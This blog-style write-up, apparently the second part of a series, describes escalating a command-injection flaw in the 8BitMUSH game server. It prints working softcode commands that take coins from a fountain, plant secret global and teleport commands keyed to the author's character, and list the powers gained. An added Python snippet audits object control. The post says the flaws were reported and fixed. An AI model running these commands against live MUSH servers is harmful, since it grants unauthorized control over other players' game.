In Part One we discovered an object that lets us execute arbitrary commands via unsafe handling of user input - the Alley room. Now we want to understand the blast radius of this issue. The first question to ask is, "What does the Alley control?"
Alley(#9485RISVB)
Type: Room Flags: TRUST STICKY VISUAL BATHROOM
Owner: 8BitMUSH Zone: NOTHING Coins: 0
Created: Sat Apr 28 13:14:31 2001
The help entry for help control tells us that if the Alley has the TRUST flag, it controls anything with the same owner that isn't set WIZARD. As it turns out, the 8BitMUSH user owns a great deal of things throughout 8Bit.
Free Money
Let's start small and find an object owned by 8BitMUSH that handles coin transactions. The Fountain on the lawn in front of the Capitol Building is one such item. We can set it visual and have a look:
(Note: The Alley room was used to run some of the following commands, similar to the commands in Part One. I simplified these examples to just show the raw commands, but remember we wouldn't have the ability to perform these commands ourselves.)
> think set(#5260,VISUAL)
> ex #5260
A Fountain(#5260V)
Type: Thing Flags: VISUAL
Owner: 8BitMUSH Zone: *NOTHING* Coins: 1
Parent: *NOTHING*
Basic Lock: Connecting..
Functions: (Inherited from 8BitMUSH) #99 #256
Created: Mon Jan 28 23:54:06 2002
Last Modification: Mon Feb 15 20:13:27 2021
APAYMENT [#1000$]: &thrown me=[add(val(v(thrown)),inc(rand(%0)))];&total_thrown me=[add(val(v(total_thrown)),%0)][null(setq(C,switch(%0,1,penny,5,nickel,10,dime,25,quarter,coin)))];@emit The pond splash as %n's coin pierces the water.;@wait 4=@emit The water ripples violently towards to the edge of the pond, the %qC sinks to the bottom of the pool and lands..;@wait 9=@emit The ripples slow down, and finally, tiny air bubbles from the landing pop upon the top of the water. A few fish inspect the newly dropped object, then quickly return to darting about the water and picking at each other for food.
ATOUCH [#1000$]: give %#=[null(setq(V,val(v(thrown))))][null(set(me,thrown:0))]%qV
COST [#1000$]: 1 5 10 25
OPAYMENT [#1000$]: tosses a [switch(%0,1,penny,5,nickel,10,dime,quarter)] into the fountain.
PAYMENT [#1000$]: You toss in a [switch(%0,1,penny,5,nickel,10,dime,quarter)].
THROWN [#7841$]: 0
TOTAL_THROWN [#7841$]: 109
TOUCH [#1000$]: [switch(val(v(thrown)),1,You grab a penny.,0,{You fish around for a while, but don't find anything..},<3,You grab some coins from the bottom of the fountain.,You grab a handful of coins! You're rich!)]
The fountain operates by accepting thrown coins and then giving them to anyone that tries to touch it. Can we simply change the THROWN attribute to be given a number of coins that weren't actually thrown?
> think set(#5260,thrown:25)
> touch fountain
You grab a handful of coins! You're rich!
A Fountain gives you 25 Coins.
It works! Let's throw back our ill-gotten gains and see what else we can find.
Tedium
Two easy methods worked to start finding interesting objects:
- Running @chan/who <channel> on all the channels
- Trying to examine some low-DBREF numbers
For each item not WIZARD owned by 8BitMUSH we can set it VISUAL and review the code. Here's one that has the Search and See_All powers that can be used for further exploring:
The Global Command Object(#1984VfScSoToTaFa)
Type: Thing Flags: VISUAL FUNCTIONS
Owner: 8BitMUSH Zone: *NOTHING* Coins: 1
Powers: Cemit Sql Pemit_All Search See_All
Location: Master Room
Let's attach a new global command to it that only we can use:
> think set(#1984,C-+SNOWDAY:$+snowday *\:@swi/first \\\[strmatch(\\\%#\\,#30406)\\\]\\=0\\,\\{@pem/s \\\%#\\=Permission denied.\\}\\,\\{@force me=think pemit(\\\%#,\\\%0\\)})
> +snowday Hello \[name(\\%#)\]!
Hello TacoSal!
Modifying the Global Command Object takes a steady hand!
The Big Hurt
Using our new command, we can see that objects owned by 8BitMUSH that are not set WIZARD have the following powers:
> +snowday \[pemit(\\%#,sort(unique(iter(lsearch(8BitMUSH,flag,!W),powers(\%i))),,,\%r))\]
Announce
Cemit
Holographic
Long_Fingers
No_Pay
Pemit_All
Queue
Search
See_All
Sql
Tport_Anything
Tport_Anywhere
Unkillable
That puts all of these powers at our disposal. Obligatory visit to the Master Room:
> think set(#5565,VISUAL)
> ex #5565
Strange Pipe(#5565IVe)
Type: Thing Flags: TRUST VISUAL ENTER_OK
Owner: 8BitMUSH Zone: *NOTHING* Coins: 1
Powers: Tport_Anything Tport_Anywhere
Location: Mario's Bathroom
> think set(#5565,CMD_WARP:$warp\:@swi/first \\\[strmatch(\\\%#\\,#30406%)\\\]\\=0\\,\\{@pem/s \\\%#\\=Permission denied.\\}\\,\\{@tel #30406=#2\\})
Now we just visit Mario's House at 30 Lakitu Blvd. and head upstairs:
> look
Mario's Bathroom
A room-length counter, with an equally long mirror above it, lines one wall of this large bathroom. Across the room from it is a shower stall. Light blue tiling covers the walls and floor, although you are not sure if the color was intended that way or has just faded into its current hue. You also see a large shower stall, a white porcelain sink, a wall cabinet with a mirror on it, and a toilet.
Contents:
Strange Pipe
Obvious exits:
Out
> warp
Master Room
This is the master room. Any exit in here is considered global. The same is true to objects with $-commands placed here. The number of objects and exits in this room should be kept to a minimum.
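For staff auditing the same exposure, the control rule from help control and the power listing above reduce to a small check over examine headers. The Python below is an added example, not code from the original post or from 8BitMUSH; it applies the rule only as this post states it (real control checks have more cases). The records are copied from this page except the invented WIZARD object #10, and parse_examine and blast_radius are hypothetical names.

```python
import re

# Records constructed from the examine headers shown on this page, plus one
# invented WIZARD object (#10) to exercise the exclusion in the rule.
SAMPLE = """\
Alley(#9485RISVB)
Type: Room Flags: TRUST STICKY VISUAL BATHROOM
Owner: 8BitMUSH Zone: NOTHING Coins: 0

The Global Command Object(#1984VfScSoToTaFa)
Type: Thing Flags: VISUAL FUNCTIONS
Owner: 8BitMUSH Zone: *NOTHING* Coins: 1
Powers: Cemit Sql Pemit_All Search See_All

Strange Pipe(#5565IVe)
Type: Thing Flags: TRUST VISUAL ENTER_OK
Owner: 8BitMUSH Zone: *NOTHING* Coins: 1
Powers: Tport_Anything Tport_Anywhere

Hypothetical Wizard Tool(#10W)
Type: Thing Flags: WIZARD
Owner: 8BitMUSH Zone: *NOTHING* Coins: 1
Powers: Queue
"""

def parse_examine(text):
    """Parse blank-line separated examine headers into dicts."""
    objs = []
    for block in text.strip().split("\n\n"):
        head = re.match(r"(.+)\(#(\d+)\w*\)", block)   # Name(#dbrefFLAGS)
        flags = re.search(r"Flags: (.*)", block)
        owner = re.search(r"Owner: (\S+)", block)
        powers = re.search(r"Powers: (.*)", block)     # line is optional
        objs.append({
            "name": head.group(1), "dbref": "#" + head.group(2),
            "flags": set(flags.group(1).split()),
            "owner": owner.group(1),
            "powers": set(powers.group(1).split()) if powers else set(),
        })
    return objs

def blast_radius(objs, entry_dbref):
    """Dbrefs and powers reachable from one injectable object (page's rule)."""
    entry = next(o for o in objs if o["dbref"] == entry_dbref)
    if "TRUST" not in entry["flags"]:
        return [], set()                 # no TRUST: controls nothing extra
    hit = [o for o in objs if o["owner"] == entry["owner"]
           and "WIZARD" not in o["flags"] and o is not entry]
    return [o["dbref"] for o in hit], set().union(*(o["powers"] for o in hit))
```

Any non-empty power set returned for a TRUST object that evaluates player input marks that object's code as the first thing to review.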
Conclusion
In the span of a week we took a missing set of brackets and escalated into more powers than ROYALTY has. MUSH veterans probably have a better vision than I do for the potential outcomes. Choose your own adventure.
Hacking 8Bit is like beating your dad in basketball. It's a little sad when you win. The good news is that these issues have been turned over to staff and corrected prior to your reading this. Our security posture will be strong when the MUSH Wars renew and we feel the sting of battle once again.
What would you do as WIZARD for a day? I can say that seeing 8Bit from the top of Mount Slappy is better than anything you can see behind the curtain. My only regret before returning to a life of peasantry is not adding the BATHROOM flag to the Fountain. But as it turns out, this ability is jealously guarded, and no one but the wizards themselves may dictate who micturates in the fountains of ANSI City.
Update: If you're looking for the secret conclusion to this series, you can find Part Three here. The password is the one-word name of Burger King's signature sandwich.